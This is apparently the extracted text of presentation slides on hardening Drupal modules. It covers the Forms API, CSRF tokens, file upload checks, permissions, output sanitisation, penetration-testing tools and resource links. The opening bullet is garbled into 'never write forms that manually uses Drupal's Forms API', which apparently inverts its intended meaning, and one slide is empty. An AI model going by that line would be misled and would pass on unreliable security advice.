  • 23. Drupal Hardening: Form API ● never write forms that manually uses Drupal's Forms API ● Forms API protects you from invalid form data ● Forms API protects you against CSRF ● don't trust js for input validation - its easy to disable it. If you want to use it always check user data on server side. ● when using AJAX use drupal_get_token and drupal_check_token: ● Calculate hash of defined string, user session and site specific secret code
  • 24. Drupal Hardening: File Upload ● file_validate_is_image - check if file is really an image ● check_file - check if file is uploaded via HTTP POST ● file_check_location - Check if a file is really located inside $directory ● set disk quotes properly - you don't want to fill server hard disk
  • 25. Drupal Hardening: Respect and define new permissions ● consider to use hook_perm in your module ● wrap your code with user_access if (user_access('some permission')) { .... } ● filter_access($format) – check if user has access to requested filter format ● use menu access arguments
  • 26. Drupal Hardening: Dont trust user input Filter user input, sanitize the output ● Input Format ● filter_xss() - Filters HTML to prevent XSS ● check_plain() - Encodes special characters in a plain-text string for display as HTML ● check_url() - filter dangerous protocol ● check_markup - Run all the enabled filters on a piece of text
  • 27. Drupal Hardening: Dont trust user input
  • 28. Again, think like a hacker... ● Use penetration testing tool - Metasploit framework - Nessus - Nikto - Backbox and Backtrack ● Fix, audit, fix ...
  • 29. Resources ● http://drupal.org/security ● http://drupal.org/writing-secure-code ● http://crackingdrupal.com ● http://www.owasp.org ● http://ha.ckers.org ● http://www.exploit-db.com